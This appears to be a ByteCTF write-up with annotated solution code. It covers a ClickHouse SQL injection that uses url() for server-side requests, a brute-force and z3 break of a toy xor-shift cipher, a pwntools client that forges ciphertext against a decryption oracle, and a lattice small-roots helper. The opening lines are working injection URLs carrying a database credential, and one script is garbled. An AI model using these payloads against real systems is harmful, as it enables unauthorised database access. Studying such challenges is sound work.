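http://39.105.175.150:30001/?id=1 union all select * from url('http%3A%2F%2Flocalhost%3A8123%2F%3Fuser%3Duser_01%26password%3De3b0c44298fc1c149afb%26query%3Dselect%2Bname%2Bfrom%2Bsystem.tables'%2C%20CSV%2C%20'column1%20String') 获得表名 : flag
(Mechanism: the `id` parameter is concatenated into the SQL text, so the appended `union all select` is executed. The `url()` table function, which looks like ClickHouse's, then makes the database request its own HTTP interface on localhost:8123 as `user_01`, presumably because the web-facing account cannot read the target table directly. Binding `id` as a typed query parameter and restricting the hosts `url()` may contact, e.g. with ClickHouse's `remote_url_allow_hosts` setting, closes both steps.)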
http://39.105.175.150:30001/?id=1 union all select * from url('http%3A%2F%2Flocalhost%3A8123%2F%3Fuser%3Duser_01%26password%3De3b0c44298fc1c149afb%26query%3Dselect%2Bname%2Bfrom%2Bsystem.columns'%2C%20CSV%2C%20'column1%20String') 获得列名 : flag
http://39.105.175.150:30001/?id=1 union all select * from url('http%3A%2F%2Flocalhost%3A8123%2F%3Fuser%3Duser_01%26password%3De3b0c44298fc1c149afb%26query%3Dselect%2Bflag%2Bfrom%2Bctf.flag'%2C%20CSV%2C%20'column1%20String') 获得flag : ByteCTF{e3b0c44298fc1c149afbf4c8}
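def shift(m, k, c):
    """Apply one masked xor-shift step to the integer ``m``.

    A negative ``k`` shifts right by ``-k`` bits; any other ``k`` shifts left
    by ``k`` bits. The shifted copy is ANDed with the mask ``c`` and XORed
    back into ``m``.

    Args:
        m: State word (a Python int; no width is enforced here).
        k: Signed shift amount.
        c: Bit mask applied to the shifted copy of ``m``.

    Returns:
        ``m ^ ((m >> -k) & c)`` for negative ``k``, else ``m ^ ((m << k) & c)``.
    """
    # The parentheses spell out Python's precedence (shift, then &, then ^);
    # the unparenthesised expression in the listing evaluates the same way.
    if k < 0:
        return m ^ ((m >> (-k)) & c)
    return m ^ ((m << k) & c)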
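def convert(m, key):
    """Run ``m`` through four masked xor-shift rounds.

    Round ``t`` calls ``shift`` with the shift amount ``key[t]`` and the fixed
    mask ``c_list[t]``.

    Every round uses only shifts, AND with a constant and XOR, so for a fixed
    key the whole map is linear over GF(2) in the bits of ``m``. A
    construction like this gives no real confidentiality: a small key search
    or an equation solver is enough to find inputs for a given output.

    Args:
        m: Input word (int).
        key: Sequence of four signed shift amounts.

    Returns:
        The transformed integer.
    """
    # The masks are constants; only the four shift amounts in `key` vary.
    c_list = [0x37386180af9ae39e, 0xaf754e29895ee11a, 0x85e1a429a2b7030c, 0x964c5a89f6d3ae8c]
    for t in range(4):
        m = shift(m, key[t], c_list[t])
    return m


from Crypto.Util.number import bytes_to_long, long_to_bytes
from random import randint, getrandbits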
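# Sample run: draw four shift amounts from [-32, 32] and a 64-bit start value,
# then print the start value and the successive convert() outputs.
# Each shift amount has 65 possible values, so there are only
# 65**4 = 17,850,625 keys in total. `random` is also not a cryptographically
# secure generator; key material belongs to `secrets` / `os.urandom`.
keys = [randint(-32, 32) for _ in range(4)]
iv = getrandbits(64)
print(iv)
# NOTE(review): indentation was lost in extraction; the print is assumed to
# sit inside the loop so that every intermediate value is shown.
for _ in range(4):
    iv = convert(iv, keys)
    print(iv)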
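# Ciphertext: 96 hex digits, i.e. six 64-bit blocks. The first three blocks
# (c1) and the last three (c2) are handled separately.
s = '89b8aca257ee2748f030e7f6599cbe0cbb5db25db6d3990d3b752eda9689e30fa2b03ee748e0da3c989da2bba657b912'
c1, c2 = s[:len(s)//2], s[len(s)//2:]
c1 = [int(c1[i:i+16], 16) for i in range(0, len(c1), 16)]
c2 = [int(c2[i:i+16], 16) for i in range(0, len(c2), 16)]

# Known-plaintext step: the flag format fixes the first eight plaintext bytes,
# so XORing them with the first ciphertext block gives the value that was
# XORed onto that block.
m1 = b'ByteCTF{'
m1 = bytes_to_long(m1)
iv_1 = m1 ^ c1[0]
print(iv_1)

# Disabled: exhaustive search over all 65**4 keys. A candidate is kept when
# the second block, XORed with convert(iv_1, key), decodes to printable text.
# Kept as a raw string so the Windows path inside it is not read as escapes.
r'''
import string
f=open(r'D:\\桌面\out.txt','w')
for a in range(-32,33):
    for b in range(-32,33):
        for c in range(-32,33):
            for d in range(-32,33):
                key=[a,b,c,d]
                kk=convert(iv_1,key)
                m=c1[1]^kk
                flag=long_to_bytes(m)
                try:
                    if all(c in string.printable for c in flag.decode()):
                        f.write(flag.decode()+str(key)+'\n')
                except:
                    pass
'''

# Disabled: with the key known, every c1 block is XORed with the running
# state, and the state is advanced with convert() after each block.
# NOTE(review): indentation was lost in extraction; print(f) is assumed to
# follow the loop.
'''
key=[-12, 26, -3, -31]
f=b''
for i in c1:
    f+=long_to_bytes(iv_1^i)
    iv_1=convert(iv_1,key)
print(f)
'''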
# Plaintext of the first three blocks: ByteCTF{5831a241s-f30980
# Shift amounts that produce the readable text above.
key = [-12, 26, -3, -31]
中间有个筛选过程:
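# Second pass over the search output: keep only lines that contain none of
# the characters listed in `xxx`.
# NOTE(review): the listing has `'*'','`, two adjacent literals that Python
# joins into the two-character string '*,'. It can never equal a single
# character, so ',' is effectively not filtered. A bare ',' entry would reject
# every line, because each line ends with str(key), which contains commas.
xxx = [
    '"', '*', '\'', '@', '~', '&', '~', '$', '\\', '|', '!', '{', '%', '}',
    '?', '=', '<', ';', '#', '^', '/', '*,', '.', '+', ':', '>', '(', ')',
]
# Context managers close both files; the listing never closed the input file.
with open(r'D:\\桌面\out.txt', 'r') as f, open(r'D:\\桌面\final.txt.', 'w') as ff:
    for i in f.readlines():
        if all(x not in xxx for x in i):
            # `i` still ends with its newline, so kept lines are followed by a
            # blank line, as in the listing.
            ff.write(i + '\n')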
得到key和前半段再解后半段CBC
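from Crypto.Util.number import *

# Bit length of eight b'f' bytes (0x66 has a leading zero bit, so 63).
print(len(bin(bytes_to_long(b'f' * 8))[2:]))
key = [-12, 26, -3, -31]
s = '89b8aca257ee2748f030e7f6599cbe0cbb5db25db6d3990d3b752eda9689e30fa2b03ee748e0da3c989da2bba657b912'
c1, c2 = s[:len(s)//2], s[len(s)//2:]
c1 = [int(c1[i:i+16], 16) for i in range(0, len(c1), 16)]
c2 = [int(c2[i:i+16], 16) for i in range(0, len(c2), 16)]

# Disabled: z3 is asked, for each target value, for an input `m` whose four
# keyed xor-shift rounds produce that value. The targets are
# 14682254609762378035 followed by the three c2 blocks.
'''
from z3 import *
c_list = [0x37386180af9ae39e, 0xaf754e29895ee11a, 0x85e1a429a2b7030c, 0x964c5a89f6d3ae8c]
ivv=[14682254609762378035]+c2
for i in ivv:
    s=Solver()
    m=BitVec('m',100)
    def shift(m, key, c_list):
        for i in range(4):
            if key[i]<0:
                m=m ^ m >> (-key[i]) & c_list[i]
            else:
                m=m ^ m << key[i] & c_list[i]
        return m
    s.add(shift(m,key,c_list)==i)
    if s.check()==sat:
        print(s.model())
'''

# Chained decryption of the second half: each inverted block is XORed with
# the previous ciphertext block, and the first with the start value.
# NOTE(review): `dec` and iv[0] are hard-coded; presumably they are the
# solver's outputs for the three c2 blocks and for 14682254609762378035.
iv = [16476971533267772345, c2[0], c2[1]]
dec = [10780708739817148043, 738617756395427640, 10936161096540945944]
f = b''
for i in range(3):
    f += long_to_bytes(dec[i] ^ iv[i])
# NOTE(review): indentation was lost in extraction; print(f) is assumed to
# follow the loop.
print(f)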
import string from binascii import * from hashlib import * from pwn import *
# Client loop for a remote decryption service (pwntools). Up to 255
# connections are made; `f` records whether a returned plaintext started
# with 'H'.
# NOTE(review): this listing lost its line breaks and indentation in
# extraction (`inrange`, `defproof_of_work`), so the nesting of the statements
# below is inferred, not shown. Presumably everything through the final
# `break` is the body of this `for` loop.
# NOTE(review): the recvuntil() delimiters are str; pwntools on Python 3
# expects bytes and warns when given text.
f=False for _ inrange(255): p=remote('39.105.115.244',30001) context.log_level='debug'
# proof_of_work tries every 4-character prefix over letters and digits
# (62**4 candidates) until SHA-256(prefix + end) equals the digest sent by the
# server, and returns that prefix. It returns None implicitly if none matches.
# The statements after it parse the challenge line and send the answer.
alphabet = string.ascii_letters + string.digits defproof_of_work(end,sha): for a in alphabet: for b in alphabet: for c in alphabet: for d in alphabet: s=a+b+c+d+end if sha256(s.encode()).hexdigest()==sha: return a+b+c+d p.recvuntil('XXXX+') end=p.recvuntil(') == ')[:-5].decode() sha=p.recvuntil('\n')[:-1].decode() xxxx=proof_of_work(end,sha) p.recvuntil('Give me XXXX > ') p.sendline(xxxx)
p.recvuntil('Please enter your cipher in hex > ')
# First query: 480 bytes of 'a' (hex 61) are submitted as ciphertext, and the
# plaintext the service returns for them is stored in `plain`.
m=480*'61' p.sendline(m) p.recvuntil('Your plaintext in hex: \n') plain=unhexlify(p.recvuntil('\n')[:-1])
# For each position i of `msg`, ciphertext byte i is replaced by
# ord('a') ^ plain[i] ^ msg[i]: the byte that was submitted, XORed with what
# the service returned for it, XORed with the wanted plaintext byte.
# The service returns the decryption of whatever ciphertext it is given, and
# nothing authenticates that ciphertext. That combination is what makes the
# plaintext steerable byte by byte. An AEAD mode, or a MAC verified before
# decryption, removes it, as does not echoing decryptions.
# NOTE(review): whether the re-query and the plain[0] == ord('H') check run
# once per byte or once after the loop cannot be told from this flattened
# text. Confirm against the original script.
msg=b'\x00'+b'ello, I\'m a Bytedancer. Please give me the flag!' pad=64-len(msg) for i inrange(len(msg)): ivs=ord('a')^plain[i] gg=hex(ivs^msg[i])[2:].zfill(2) m=m[:i*2]+gg+m[2*i+2:] p.recvuntil('Please enter your cipher in hex > ') p.sendline(m) p.recvuntil('Your plaintext in hex: \n') plain=unhexlify(p.recvuntil('\n')[:-1]) print(plain) if plain[0]==ord('H'): f=True else: break
# Final query: the ciphertext is cut to 63 bytes plus one replacement byte
# computed the same way, so that byte 63 decrypts to pad = 64 - len(msg).
# When `f` is set, the remaining server output is read and the loop ends.
ivs=ord('a')^plain[63] gg=hex(ivs^pad)[2:].zfill(2) m=m[:126]+gg p.recvuntil('Please enter your cipher in hex > ') p.sendline(m) p.recvuntil('Your plaintext in hex: \n') plain=unhexlify(p.recvuntil('\n')[:-1]) print(plain) if f: p.recvall() break
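import itertools


def small_roots(f, bounds, m=1, d=None):
    """Search for small roots of a modular polynomial with lattice reduction.

    This is Sage code: it relies on the Sage globals ``ZZ``, ``QQ``,
    ``Sequence``, ``vector``, ``prod`` and ``power``, and ``^`` means
    exponentiation under the Sage preparser.

    Args:
        f: Polynomial whose base ring has finite cardinality. That
            cardinality is used as the modulus ``N``.
        bounds: One size bound per variable. Each monomial is evaluated at
            these bounds to scale the lattice columns.
        m: Highest power of ``f`` used when building shift polynomials.
        d: Exclusive upper limit on the exponents of the monomial shifts.
            Defaults to ``f.degree()``.

    Returns:
        A list of root tuples, one entry per variable, mapped back into the
        base ring of ``f``. An empty list if no zero-dimensional ideal is
        reached.
    """
    if not d:
        d = f.degree()

    R = f.base_ring()
    N = R.cardinality()

    # Normalise by the first listed coefficient, then lift to the integers.
    f /= f.coefficients().pop(0)
    f = f.change_ring(ZZ)

    # Shift polynomials N^(m-i) * f^i * (monomial shifts).
    G = Sequence([], f.parent())
    for i in range(m + 1):
        base = N^(m - i) * f^i
        for shifts in itertools.product(range(d), repeat=f.nvariables()):
            g = base * prod(map(power, f.variables(), shifts))
            G.append(g)

    B, monomials = G.coefficient_matrix()
    monomials = vector(monomials)

    # Scale every column by its monomial evaluated at the bounds, reduce the
    # lattice, then undo the scaling.
    factors = [monomial(*bounds) for monomial in monomials]
    for i, factor in enumerate(factors):
        B.rescale_col(i, factor)

    B = B.dense_matrix().LLL()

    B = B.change_ring(QQ)
    for i, factor in enumerate(factors):
        B.rescale_col(i, 1 / factor)

    # Add reduced polynomials one at a time until the ideal is
    # zero-dimensional. A polynomial that makes the ideal trivial is dropped.
    H = Sequence([], f.parent().change_ring(QQ))
    for h in filter(None, B * monomials):
        H.append(h)
        I = H.ideal()
        if I.dimension() == -1:
            H.pop()
        elif I.dimension() == 0:
            roots = []
            for root in I.variety(ring=ZZ):
                root = tuple(R(root[var]) for var in f.variables())
                roots.append(root)
            return roots

    return []


from pwn import *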
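#0123456789abcdef
# Forward check: the four weighted sums evaluated for the byte values
# 0x32, 0x33, 0x30, 0x31 (the characters '2', '3', '0', '1').
print(hex((0x15*0x32+3*0x33+1*0x30+5*0x31)))
print(hex(0xd*0x32+2*0x33+1*0x30+8*0x31))
print(hex(0x8*0x32+1*0x33+2*0x30+0xd*0x31))
print(hex((0x5*0x32+1*0x33+3*0x30+0x15*0x31)))
# Disabled: search all printable 4-byte combinations for the one that
# satisfies the four linear equations with the target sums below.
# for a1 in range(0x20,0x7f):
#     for a2 in range(0x20,0x7f):
#         for a3 in range(0x20,0x7f):
#             for a4 in range(0x20,0x7f):
#                 if 0x55f==(0x15*a1+3*a2+1*a3+5*a4) and 0x559==(0xd*a1+2*a2+1*a3+8*a4) and\
#                    0x6da== (0x8*a1+1*a2+2*a3+0xd*a4) and 0x9e1==(0x5*a1+1*a2+3*a3+0x15*a4) :
#                     print(chr(a3)+chr(a4)+chr(a1)+chr(a2))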